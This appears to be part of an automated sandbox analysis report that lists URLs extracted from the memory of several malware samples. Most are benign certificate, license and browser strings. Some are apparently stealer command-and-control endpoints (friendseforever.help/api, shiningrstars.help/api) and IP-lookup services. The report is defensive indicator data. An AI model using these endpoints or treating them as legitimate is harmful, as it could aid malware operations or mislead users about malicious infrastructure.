Source: random.exe, 00000000.00000003.1738571746.0000000005A2A000.00000004.00000800.00020000.00000000.sdmp, 0LGvvQO.exe, 00000030.00000003.2857556882.000000000929A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: 28qbTrm.exe, 0000001C.00000002.2698561168.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000026.00000002.2941190811.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.???.xx/?search=%s
Source: TiVoServer.exe, 0000002D.00000003.2809913311.000000000A165000.00000004.00000001.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.
Source: nss3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: TiVoServer.exe, 0000002D.00000002.2897065999.0000000068641000.00000002.00000001.01000000.00000020.sdmp	String found in binary or memory: http://www.freedesktop.org/standards/desktop-bookmarks
Source: TiVoServer.exe, 0000002D.00000002.2897065999.0000000068641000.00000002.00000001.01000000.00000020.sdmp	String found in binary or memory: http://www.freedesktop.org/standards/desktop-bookmarksapplicationgroupapplicationsgroupsprivatehttp:
Source: TiVoServer.exe, 0000002D.00000002.2897065999.0000000068641000.00000002.00000001.01000000.00000020.sdmp	String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
Source: TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.gnu.org/copyleft/library.html.
Source: TiVoServer.exe, 0000002D.00000003.2809913311.000000000A165000.00000004.00000001.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.txt.
Source: TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.gnu.org/licenses/old-licenses/old-licenses.html#LGPL.
Source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/talk/protocol/auth
Source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/talk/protocol/authga:client-uses-full-bind-resulttruePLAIN%s:
Source: TiVoServer.exe, 0000002D.00000002.2856869040.00000000093B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: TiVoServer.exe, 0000002D.00000003.2809913311.000000000A165000.00000004.00000001.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.loudmouth-project.org/.
Source: TiVoServer.exe, 0000002D.00000003.2809913311.000000000A165000.00000004.00000001.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.matroska.org
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2160323132.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: TiVoServer.exe, 0000002D.00000003.2809913311.000000000A165000.00000004.00000001.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.netbsd.org/.
Source: TiVoServer.exe, 0000002D.00000003.2809913311.000000000A165000.00000004.00000001.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.nevrona.com/indy/.
Source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159337557.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.surfok.de/
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: TiVoServer.exe, 0000002D.00000000.2792193596.00000000005E6000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.tivo.com/source.
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: random.exe, 00000000.00000003.1738571746.0000000005A2A000.00000004.00000800.00020000.00000000.sdmp, 0LGvvQO.exe, 00000030.00000003.2857556882.000000000929A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: random.exe, 00000000.00000003.1738571746.0000000005A2A000.00000004.00000800.00020000.00000000.sdmp, 0LGvvQO.exe, 00000030.00000003.2857556882.000000000929A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 28qbTrm.exe, 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, 28qbTrm.exe, 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: random.exe, 00000000.00000003.1740281867.00000000059F8000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2156044589.000000000BC72000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: random.exe, 00000000.00000003.1740281867.00000000059F8000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2156044589.000000000BC72000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2774644118.0000000003580000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: random.exe, 00000000.00000003.1740281867.00000000059F8000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2156044589.000000000BC72000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: random.exe, 00000000.00000003.1740281867.00000000059F8000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2156044589.000000000BC72000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2774644118.0000000003580000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: random.exe, 00000000.00000003.1769992828.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.he
Source: random.exe, 00000000.00000003.1710265090.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757399836.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1805190405.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757292743.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757292743.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804853776.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1844306331.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1710074783.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757399836.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/
Source: random.exe, 00000000.00000003.1804853776.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1844306331.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/9
Source: random.exe, 00000000.00000003.1699101050.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1710265090.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/=
Source: random.exe, random.exe, 00000000.00000003.1699101050.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1710265090.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1845298016.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1710323190.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1805190405.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1710108148.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804898916.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757292743.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1697712342.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804853776.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1844306331.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757399836.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/api
Source: random.exe, 00000000.00000003.1804853776.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/apiEMHEM
Source: random.exe, 00000000.00000003.1845298016.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1805190405.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757292743.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804853776.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1844306331.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757399836.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/apiKf)
Source: random.exe, 00000000.00000003.1845298016.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1805190405.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757292743.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804853776.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1844306331.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757399836.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/apiakif
Source: random.exe, 00000000.00000003.1805190405.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/apie=
Source: random.exe, 00000000.00000003.1805190405.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/apiw
Source: random.exe, 00000000.00000003.1844306331.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/cK7
Source: random.exe, 00000000.00000003.1757292743.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804853776.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1844306331.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757399836.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help/m
Source: random.exe, 00000000.00000003.1710108148.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804955171.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1697862598.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1769471972.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757864242.0000000000B25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help:443/api
Source: random.exe, 00000000.00000003.1710108148.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804955171.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1769471972.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757864242.0000000000B25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://friendseforever.help:443/apiOI
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2774644118.0000000003580000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: 28qbTrm.exe, 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, 28qbTrm.exe, 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is/
Source: nss3.dll.1.dr	String found in binary or memory: https://mozilla.org0/
Source: GWZ8arC.exe, 00000017.00000002.2766792446.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2776473412.0000000003592000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shiningrstars.help/
Source: GWZ8arC.exe, 00000017.00000002.2766792446.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shiningrstars.help/api
Source: GWZ8arC.exe, 00000017.00000002.2766792446.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shiningrstars.help/apiA
Source: GWZ8arC.exe, 00000017.00000002.2766792446.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shiningrstars.help/apidB
Source: GWZ8arC.exe, 00000017.00000002.2776341908.000000000358A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shiningrstars.help/apiz
Source: GWZ8arC.exe, 00000017.00000002.2776473412.0000000003592000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shiningrstars.help/z
Source: GWZ8arC.exe, 00000017.00000002.2766792446.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shiningrstars.help:443/apiCLSID
Source: 28qbTrm.exe, 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, 28qbTrm.exe, 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 28qbTrm.exe, 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, 28qbTrm.exe, 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, services.exe, 00000026.00000002.2941190811.00000000036E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 28qbTrm.exe, 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, 28qbTrm.exe, 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
Source: random.exe, 00000000.00000003.1712648952.0000000005A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2111903097.000000000BEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: random.exe, 00000000.00000003.1739862651.0000000005B1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2111903097.000000000BEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: random.exe, 00000000.00000003.1725265890.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1712699083.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1712648952.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1724942256.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2025166255.0000000005AF2000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000734000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: random.exe, 00000000.00000003.1712699083.0000000005A24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: random.exe, 00000000.00000003.1725265890.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1712699083.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1712648952.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1724942256.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2025166255.0000000005AF2000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000734000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: random.exe, 00000000.00000003.1712699083.0000000005A24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000734000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: random.exe, 00000000.00000003.1740281867.00000000059F8000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2156044589.000000000BC72000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2774644118.0000000003580000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: random.exe, 00000000.00000003.1697668217.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1697712342.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: random.exe, 00000000.00000003.1697712342.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1698239948.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1697668217.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1697712342.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: random.exe, 00000000.00000003.1740281867.00000000059F8000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2156044589.000000000BC72000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2774644118.0000000003580000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: random.exe, 00000000.00000003.1711571543.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1711663173.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000817000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2111903097.000000000BEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000817000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000817000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2111903097.000000000BEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000817000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: random.exe, 00000000.00000003.1739862651.0000000005B1C000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2111903097.000000000BEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000817000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
